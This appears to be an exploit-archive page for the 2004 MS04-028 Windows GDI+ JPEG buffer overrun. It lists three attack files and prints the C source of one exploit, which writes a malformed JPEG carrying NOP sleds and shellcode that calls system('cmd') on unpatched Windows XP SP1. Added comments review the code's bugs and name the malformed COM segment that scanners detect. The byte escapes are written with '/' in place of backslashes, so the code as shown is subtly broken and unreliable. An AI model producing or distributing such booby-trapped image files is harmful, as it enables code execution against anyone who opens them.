Microsoft Windows GDI+ JPG_Exp


WinJPEGAdminExp_MS04-028.sh 攻击程序   Windows   7.62 K   2004-09-23   dav1d 
WinJPEG(GDI+)Exp_MS04-028.c 攻击程序   Windows   7.40 K   2004-09-23   dav1d 
WinJPEGbufferExp_MS04-028.sh 攻击程序   Windows   4.36 K   2004-09-23   dav1d 



// GDI+ buffer overrun exploit by FoToZ
// NB: the headers here are only sample headers taken from a .JPG file,
// with the FF FE 00 01 inserted in header1.
// Sample shellcode is provided
// You can put approx. 2500 bytes of shellcode...who needs that much anyway
// Tested on an unpatched WinXP SP1

#include <direct.h>
#include <stdio.h>

char shellcode[]=
"/x68" // push
"cmd "
"/x8B/xC4" // mov eax,esp
"/x50" // push eax
"/xB8/x44/x80/xC2/x77" // mov eax,77c28044h (address of system() on WinXP SP1)
"/xFF/xD0" // call eax
;

char header1[]=
"/xFF/xD8/xFF/xE0/x00/x10/x4A/x46/x49/x46/x00/x01/x02/x00/x00/x64"
"/x00/x64/x00/x00/xFF/xEC/x00/x11/x44/x75/x63/x6B/x79/x00/x01/x00"
"/x04/x00/x00/x00/x0A/x00/x00/xFF/xEE/x00/x0E/x41/x64/x6F/x62/x65"
"/x00/x64/xC0/x00/x00/x00/x01/xFF/xFE/x00/x01/x00/x14/x10/x10/x19"
"/x12/x19/x27/x17/x17/x27/x32/xEB/x0F/x26/x32/xDC/xB1/xE7/x70/x26"
"/x2E/x3E/x35/x35/x35/x35/x35/x3E";

char setNOPs1[]=
"/xE8/x00/x00/x00/x00/x5B/x8D/x8B"
"/x00/x05/x00/x00/x83/xC3/x12/xC6/x03/x90/x43/x3B/xD9/x75/xF8";

char setNOPs2[]=
"/x3E/xE8/x00/x00/x00/x00/x5B/x8D/x8B"
"/x2F/x00/x00/x00/x83/xC3/x12/xC6/x03/x90/x43/x3B/xD9/x75/xF8";

char header2[]=
"/x44"
"/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x01/x15/x19/x19"
"/x20/x1C/x20/x26/x18/x18/x26/x36/x26/x20/x26/x36/x44/x36/x2B/x2B"
"/x36/x44/x44/x44/x42/x35/x42/x44/x44/x44/x44/x44/x44/x44/x44/x44"
"/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44"
"/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/xFF/xC0/x00"
"/x11/x08/x03/x59/x02/x2B/x03/x01/x22/x00/x02/x11/x01/x03/x11/x01"
"/xFF/xC4/x00/xA2/x00/x00/x02/x03/x01/x01/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x03/x04/x01/x02/x05/x00/x06/x01/x01/x01/x01"
"/x01/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x01/x00/x02"
"/x03/x10/x00/x02/x01/x02/x04/x05/x02/x03/x06/x04/x05/x02/x06/x01"
"/x05/x01/x01/x02/x03/x00/x11/x21/x31/x12/x04/x41/x51/x22/x13/x05"
"/x61/x32/x71/x81/x42/x91/xA1/xC1/x52/x23/x14/xB1/xD1/x62/x15/xF0"
"/xE1/x72/x33/x06/x82/x24/xF1/x92/x43/x53/x34/x16/xA2/xD2/x63/x83"
"/x44/x54/x25/x11/x00/x02/x01/x03/x02/x04/x03/x08/x03/x00/x02/x03"
"/x01/x00/x00/x00/x00/x01/x11/x21/x31/x02/x41/x12/xF0/x51/x61/x71"
"/x81/x91/xA1/xB1/xD1/xE1/xF1/x22/x32/x42/x52/xC1/x62/x13/x72/x92"
"/xD2/x03/x23/x82/xFF/xDA/x00/x0C/x03/x01/x00/x02/x11/x03/x11/x00"
"/x3F/x00/x0F/x90/xFF/x00/xBC/xDA/xB3/x36/x12/xC3/xD4/xAD/xC6/xDC"
"/x45/x2F/xB2/x97/xB8/x9D/xCB/x63/xFD/x26/xD4/xC6/xD7/x70/xA4/x19"
"/x24/x50/xCA/x46/x2B/xFC/xEB/x3B/xC7/xC9/xA5/x4A/x8F/x69/x26/xDF"
"/x6D/x72/x4A/x9E/x27/x6B/x3E/xE6/x92/x86/x24/x85/x04/xDB/xED/xA9"
"/x64/x8E/x6B/x63/x67/x19/x1A/xA5/xE7/xB8/x28/x3D/x09/xAB/x5D/x5F"
"/x16/xF7/x8C/xED/x49/x4C/xF5/x01/xE6/xE5/xD5/x1C/x49/xAB/x10/x71"
"/xA6/x36/x9B/x93/x24/x61/x00/x0F/x61/xEC/x34/xA7/x9C/x23/xF4/x96"
"/xC6/xE6/xAF/xB7/x80/x76/xEF/x93/xF0/xAA/x28/x8A/x6B/xE0/x18/xC0"
"/xA4/x9B/x7E/x90/x39/x03/xC2/x90/xDC/x43/x31/x91/x62/x91/x86/x23"
"/x35/x35/xA2/x80/x4D/xFA/x72/x31/x07/x9D/x03/x70/xA8/x93/x24/x4F"
"/x89/x51/x83/x5E/xA4/x2E/x7A/xC0/x7D/xA9/x8A/x10/x61/x64/x07/xFA"
"/x88/xC6/x89/x26/xDA/x0F/x20/xBD/xB9/x16/xD2/xA8/xE8/x91/x3F/x1A"
"/xE2/xBA/xF0/xBE/x74/xAB/x1D/xC4/x44/x15/x1A/x8A/x9C/xC7/x2A/x6B"
"/xA3/x33/xB7/x1E/x88/x47/x69/xA9/x64/x68/x26/xC1/x97/x0B/xD6/x86"
"/x8B/x1B/x29/xC6/x87/xE4/xC7/xFD/xCC/x53/x11/xA5/x9C/x62/x6A/xE5"
"/x40/x37/x61/x89/xF6/xB2/x9C/x2A/x7C/xFD/x05/x6A/x30/x5F/x52/x02"
"/xEB/x72/xBF/x7D/x74/x4C/x23/xB9/x8F/xD8/x78/x67/x54/x59/x64/x47"
"/xC5/x75/x21/x18/xD5/xE3/x58/xE1/x72/x63/xBF/x6D/xBD/xCB/xCA/x82"
"/x65/xE7/xDB/x09/x54/x4F/x0D/x95/x86/x76/xE3/xF2/xA0/x48/x82/x55"
"/xD7/xA6/xCE/xA7/xAA/xDC/x6A/xF1/xA9/x8E/xE0/x35/xC1/xCA/xA1/xD4"
"/x93/xD2/xD6/x39/x95/x3C/x6B/x46/x60/xAC/xC1/x3B/x60/xC9/x70/x84"
"/x8E/xA1/x9A/x9A/x20/x01/x94/xCA/x08/x91/x53/xDC/x01/xB1/xB5/x12"
"/x37/x11/xC6/xC1/xAC/xF1/x11/xD4/x9C/x6B/x3E/x69/x76/xF0/x1D/x7B"
"/x52/x6D/xC9/xA8/x66/x94/xBB/x79/x8F/x7E/xDE/x17/xFD/x4D/xAB/x1E"
"/x76/x7A/xA3/x2B/xE2/x50/x06/xB7/x2C/xEB/x2A/x49/xC9/xEA/x4E/x9B"
"/xE7/xCA/xAF/x1E/xEC/x23/xDC/x8B/xE1/x6B/x5F/x1A/x9B/xE8/x49/x2E"
"/x63/xE5/x03/x32/xCD/x19/xB8/x23/x10/x78/x1F/x85/x5C/x15/x8C/x97"
"/x84/x9B/xDB/x15/x35/x9F/x16/xE0/x1E/x86/xB9/x8F/x97/x11/x4E/xDA"
"/x35/x02/x45/x25/x93/xF8/x55/x24/x17/xB9/x1B/xF5/xC8/x07/xA9/xE2"
"/x2A/x76/xB0/xC2/x37/x01/x95/xAD/x81/xB6/x1C/x6A/xA2/x38/xD9/xAE"
"/xCA/x59/x18/x75/x25/xFF/x00/x81/xAE/xD8/xE8/xBB/x47/x62/xAC/xB7"
"/xB6/xA1/x8D/x40/xE3/x86/x65/x6D/x1E/xDB/x89/x2F/x9D/xCD/x6B/x24"
"/x62/x41/x61/x89/xAC/x2D/x8B/x3E/xB6/x68/xC0/x63/x73/x70/x6B/x6B"
"/x6A/xA1/x7A/xAC/x56/xE7/x11/x56/x58/xD4/x13/xA4/x0B/xB6/xEB/xB3"
"/x3B/x47/x22/x95/xD3/x53/x2E/xEA/x19/x86/x96/xF7/x03/x83/x52/x9E"
"/x54/xAB/x6E/x58/x63/x7C/x33/xCE/x93/xB1/x19/x1C/xE9/xDB/xAA/x35"
"/xBF/x46/x8D/xD4/xD2/x56/xE0/xE0/x33/xA1/x4D/x0A/x4E/x3B/xB1/xCD"
"/xD4/x06/x44/x56/x4A/xCD/x24/x26/xEA/x6D/x7A/x87/xDC/x3B/x60/x6D"
"/xFC/x2A/x86/x1B/x97/x36/x6D/x42/x04/xA0/x11/xEE/xE7/x46/x22/x35"
"/xD5/x26/xB0/x1C/x0B/x7C/x69/x5F/x06/xEC/x5A/xC5/x0B/x46/x70/x27"
"/xF2/xD4/x79/xAD/x89/xDA/x30/x74/xBD/x98/xE4/x68/x58/x86/xE4/x1B"
"/x69/xB9/xDC/x2B/x30/x87/x48/x53/xC5/x85/x3B/xDD/x8A/x4E/xB5/x42"
"/xB2/x8C/x6E/x2C/x01/xF8/x56/x04/x7B/xC9/xA3/x05/x4F/xB4/xD5/xA2"
"/xDF/xF6/xFD/xC6/xE2/xA7/x3C/x89/x24/xFE/xA9/x5E/xC3/xD4/x6D/xF7"
"/x85/xC9/x59/x39/x63/x59/x9B/xFF/x00/x06/x1A/x5E/xFA/x69/x0A/x46"
"/x2B/xC0/x9F/xC2/x91/x8B/xC9/x40/x58/x16/xBD/xF2/xC0/xD3/x3B/x7F"
"/x2D/xA9/xBB/x2E/x49/x42/x6D/x52/x70/x39/x62/x9F/x08/x73/x6F/x20"
"/x09/x64/x00/x01/x83/x2B/x00/xD5/x97/xBC/xDC/xF6/x9C/xA7/x66/xEA"
"/xD9/xB6/x9F/xE1/x56/xDE/xBA/xEC/x65/xB4/x44/xD8/xE3/x8D/x52/x2F"
"/x36/xCE/x74/x33/x7E/x9F/x2E/x22/x99/x8B/xC9/x6D/x5A/x6D/x9E/xA8"
"/x22/xC7/x0C/xA8/x62/x3D/x17/x1D/x2F/xC8/xFA/xD4/xB0/x9E/x14/x45"
"/x45/xD5/x6E/x96/x04/xE1/xF1/xA0/x37/x90/x5B/xD8/x7F/x81/x57/x1B"
"/xC8/xD5/x48/x27/x0E/x3C/x6B/x3D/xCD/x44/x15/x92/x41/x25/x94/x82"
"/xAE/x0E/x42/x97/x8D/x8C/x6D/xAE/x56/xB8/x26/xD8/x0F/xE3/x43/x93"
"/x73/x18/x75/x28/xD7/xF8/xD5/xFF/x00/x74/xE4/x18/xC2/x82/xAC/x6F"
"/x86/x7F/x2A/x4C/xBE/xE5/xFC/xD2/x22/xCC/x9A/x32/xD1/x7C/x7D/x68"
;

/*
 * Writes the byte arrays declared above (header1, setNOPs1, header2,
 * shellcode, setNOPs2), separated by runs of 0x90 padding, into
 * FoToZ_JPEG//FoToZ.jpg and terminates the file with an FF D9 marker.
 *
 * Review notes (code left exactly as published):
 *  - `void main()`, the one-argument mkdir() and fcloseall() are MSVC /
 *    <direct.h> CRT extensions rather than standard C.
 *  - No fputc()/fprintf()/fcloseall() result is checked, so a short write
 *    produces a silently truncated file.
 *  - The early `return` inside the FF D9 scan exits with fout still open.
 *  - Defender's note: the emitted file carries the FF FE 00 01 COM segment
 *    mentioned in the file header comment; a COM segment whose length
 *    field is below 2 is the malformed-structure indicator that MS04-028
 *    content scanners keyed on — TODO confirm against the rule set in use.
 */
void main()
{
        FILE *fin,*fout;        /* fin is declared but never used */
        unsigned int i=0,j=0;
        unsigned char c;        /* c is declared but never used */
  mkdir("FoToZ_JPEG");          /* return value unchecked; if the directory cannot be created the fopen() below fails instead */
  fout=fopen("FoToZ_JPEG//FoToZ.jpg","wb");
        
        if( !fout ) {
                printf("ERROR OPENING FILES/n");
                return;
        }
        /* sizeof yields size_t; "%u" is the wrong conversion for it ("%zu" in C99+) */
        printf("shellcode size is %u bytes/n", sizeof(shellcode)-1);
        /* Refuse a shellcode array containing the byte pair FF D9, the same
         * end-of-image marker written at the end of the file (0xD9FF as a
         * little-endian unsigned short). The cast is an unaligned,
         * strict-aliasing-violating read; on the last iteration it reads the
         * array's NUL terminator, so it stays inside the object. */
        for(i=0;i<sizeof(shellcode)-1;i++)
                if( 0xD9FF == *(unsigned short *)&shellcode[i] ) {
                        printf("WARNING: SHELLCODE CONTAINS FFh D9h/n"
                                   "FIX UR SHELLCODE/n");
                        return; /* fout is not closed on this path */
                }
        /* j = number of bytes the next three loops emit (each array minus its NUL) */
        j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
        for(i=0;i<sizeof(header1)-1;i++)
   fputc(header1[i],fout);
        for(i=0;i<sizeof(setNOPs1)-1;i++)
   fputc(setNOPs1[i],fout);
        for(i=0;i<sizeof(header2)-1;i++)
   fputc(header2[i],fout);
        /* pad with 0x90 from the current file offset (j) up to offset 0x63c */
        for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
        j=i;    /* j now holds the file offset (0x63c) at which shellcode starts */
        for(i=0;i<sizeof(shellcode)-1;i++)
   fputc(shellcode[i],fout);
        /* i+j is the current file offset; pad so that setNOPs2, written next,
         * ends exactly at offset 0x1000 (sizeof includes the NUL, hence the +1).
         * If the shellcode already reaches past that point no padding is
         * written and the following loop is cut short by its i<0x1000 guard. */
        for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++)
   fputc(0x90,fout); // stuff NOPs
        // (stuffing NOPs is becoming a bad habit)
        for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++)
   fputc(setNOPs2[j],fout);
        
        /* end-of-image marker; written with a literal format string */
        fprintf(fout,"/xFF/xD9");
        fcloseall();    /* MSVC CRT: closes every open stream, including fout; result unchecked */
}